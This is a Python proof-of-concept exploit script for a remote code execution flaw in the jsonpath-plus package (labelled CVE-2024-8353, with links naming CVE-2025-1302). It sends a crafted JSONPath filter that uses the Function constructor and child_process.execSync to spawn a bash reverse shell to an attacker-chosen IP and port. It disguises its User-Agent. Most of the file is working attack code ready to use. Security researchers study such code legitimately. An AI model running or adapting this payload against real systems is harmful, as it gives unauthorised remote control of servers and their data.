import requests
from faker import Faker
from urllib.parse import urlparse
import time
import sys
import rich_click as click
# Silence urllib3's InsecureRequestWarning process-wide. Note that
# sendRequest() never passes verify=False, so TLS verification stays at the
# requests default and a self-signed target will still fail with SSLError;
# this line only matters if verification is disabled later.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Banner printed by JSONPath_plus_Exploit.greeting(). The trailing block names
# CVE-2024-8353 (jsonpath-plus < 10.3.0), while the Github/Analysis links point
# at a repository named CVE-2025-1302 -- NOTE(review): confirm which is intended.
banner = r"""
..-+*******-
.=#+-------=@. .:==:.
.**-------=*+: .-=++.-+=:.
+*-------=#=+++++++++=:.. -+:==**=+-+:.
.%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=..
:%--**+-::::::::::::::::::::+*=: .::*=**=:.
..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:.
..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-.
.-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:..
..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=.
.=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%-
.*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%-
.+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%-
.+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%-
.=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#-
.=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#-
.-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*:
:+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*.
.-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+.
.::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-.
%+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%.
*+.......+*::::::::::::::::-****-:::::=*=:.++:*=
.%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#.
++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=.
:#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-..
.++....-#:::%. .-*+-..*=.+@= .=+..-#
.:+++#@#-:-#= ... .-++:-%@@= .:#
:+++**##@#+=. -%@@@%- .-=*#.
.=+::+::-@: #@@@@+. :+*=::=*-
.=+:-**+%%+=-:.. =*#*-..=*-:::::=*
:++---::--=*#+*+++++**+*+**-::::::+=
.+*=:::---+*:::::++++++*+=:::::-*=.
.:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team)
..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2025-1302
Analysis base : https://github.com/EQSTLab/CVE-2025-1302
=============================================================================================================
CVE-2024-8353 : JSONPath-plus Remote Code Execution
description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
=============================================================================================================
"""
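class JSONPath_plus_Exploit:
    """PoC driver for CVE-2024-8353 (jsonpath-plus < 10.3.0, RCE via filter eval).

    The target endpoint is expected to take the ``path`` field of a JSON POST
    body and evaluate it as a JSONPath expression. The expression carries a
    filter whose JavaScript obtains the ``Function`` constructor through
    ``''['constructor']['constructor']``, compiles a string that calls
    ``require('child_process').execSync(...)`` via ``this.process`` and runs
    it, spawning ``bash -i`` connected back to ``ip``:``port``.

    Only use against systems you are explicitly authorised to test. Start a
    TCP listener on ``ip``:``port`` before calling ``exploit()``.
    """

    def __init__(self, url: str, ip: str, port: int):
        """Record the target and the reverse-shell listener.

        Args:
            url:  Endpoint that accepts ``{"path": <jsonpath>}`` as JSON.
            ip:   LHOST the shell connects back to. It is interpolated
                  verbatim into a quoted JavaScript/bash string, so it must be
                  a plain address with no quotes, spaces or slashes.
            port: LPORT the shell connects back to.
        """
        self.url = url
        self.ip = ip
        self.port = port
        # Kept for compatibility with existing callers; not used by this class.
        self.formId = None

    @staticmethod
    def greeting() -> None:
        """Print the module-level ``banner``."""
        print(banner)

    @staticmethod
    def spinner(duration=10, interval=0.1) -> None:
        """Animate a text spinner on stdout for roughly ``duration`` seconds.

        Purely cosmetic. A ``duration`` <= 0 skips the loop and prints only
        the trailing newline.
        """
        frames = ['|', '/', '-', '\\']
        deadline = time.time() + duration
        while time.time() < deadline:
            for frame in frames:
                sys.stdout.write(f'\r[{frame}] Exploit loading, please wait...')
                sys.stdout.flush()
                time.sleep(interval)
        print("")

    def build_payload(self) -> str:
        """Return the JSONPath filter expression that spawns the reverse shell.

        Inside the filter, ``p`` holds the JavaScript source to execute;
        ``''[['constructor']][['constructor']]`` resolves to ``Function``, so
        ``Ethan = Function(p); Ethan()`` compiles and runs it in the target
        process. ``this.process`` relies on the filter's ``this`` exposing the
        Node ``process`` object.
        """
        shell_cmd = f'bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1'
        # The command is wrapped in escaped double quotes so it survives
        # being embedded in the single-quoted execSync() argument.
        js_source = (
            "console.log(this.process.mainModule.require('child_process')"
            f".execSync('bash -c \\\"{shell_cmd}\\\"').toString())"
        )
        return (
            f'$..[?(p="{js_source}";'
            "Ethan=''[['constructor']][['constructor']](p);Ethan())]"
        )

    def sendRequest(self) -> None:
        """POST the payload to ``self.url`` and report the outcome.

        A timeout is treated as the expected outcome: ``execSync`` typically
        blocks for as long as the interactive shell is alive, so the HTTP
        response usually never arrives. Other transport errors (connection
        refused, SSLError -- TLS verification is left at the requests default)
        are reported instead of raising a traceback. Neither message proves
        code execution; confirm on the listener.
        """
        headers = {
            # Randomised User-Agent header.
            'User-Agent': Faker().user_agent(),
            'Content-Type': 'application/json',
            'Accept': '*/*',
        }
        try:
            response = requests.post(
                self.url,
                json={'path': self.build_payload()},
                headers=headers,
                timeout=10,
            )
        except requests.exceptions.Timeout:
            print("[+] Exploit Completion!!")
        except requests.exceptions.RequestException as exc:
            print(f"[-] Request failed: {exc}")
        else:
            print("[+] Exploit Completion!!")
            # A response came back, so the command returned (or the filter was
            # rejected); surface the status code for triage.
            print(f"[*] HTTP {response.status_code}")

    def exploit(self) -> None:
        """Fire the payload once (see ``sendRequest``)."""
        self.sendRequest()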
# argument parsing with rich_click
@click.command()
@click.option("-u", "--url", required=True,
              help="Specify a URL or domain for vulnerability detection (Donation-Form Page)")
@click.option("-i", "--ip", required=True,
              help="LHOST for reverse shell connection")
@click.option("-p", "--port", required=True, type=int,
              help="LPORT for reverse shell connection")
def main(url: str, ip: str, port: int) -> None:
    """CLI entry point: show the banner, then send the payload to ``url``.

    ``ip``/``port`` identify the listener the spawned shell connects back to;
    have a TCP listener bound there before running. The "Exploit Completion"
    message only means the request was sent or timed out -- confirm success on
    the listener, not from this output.
    """
    JSONPath_plus_Exploit.greeting()
    JSONPath_plus_Exploit.spinner(duration=1)
    JSONPath_plus_Exploit(url, ip, port).exploit()
# Script entry point. ``main`` is a click command, so calling it parses
# sys.argv and exits via SystemExit when done.
if __name__ == "__main__":
    main()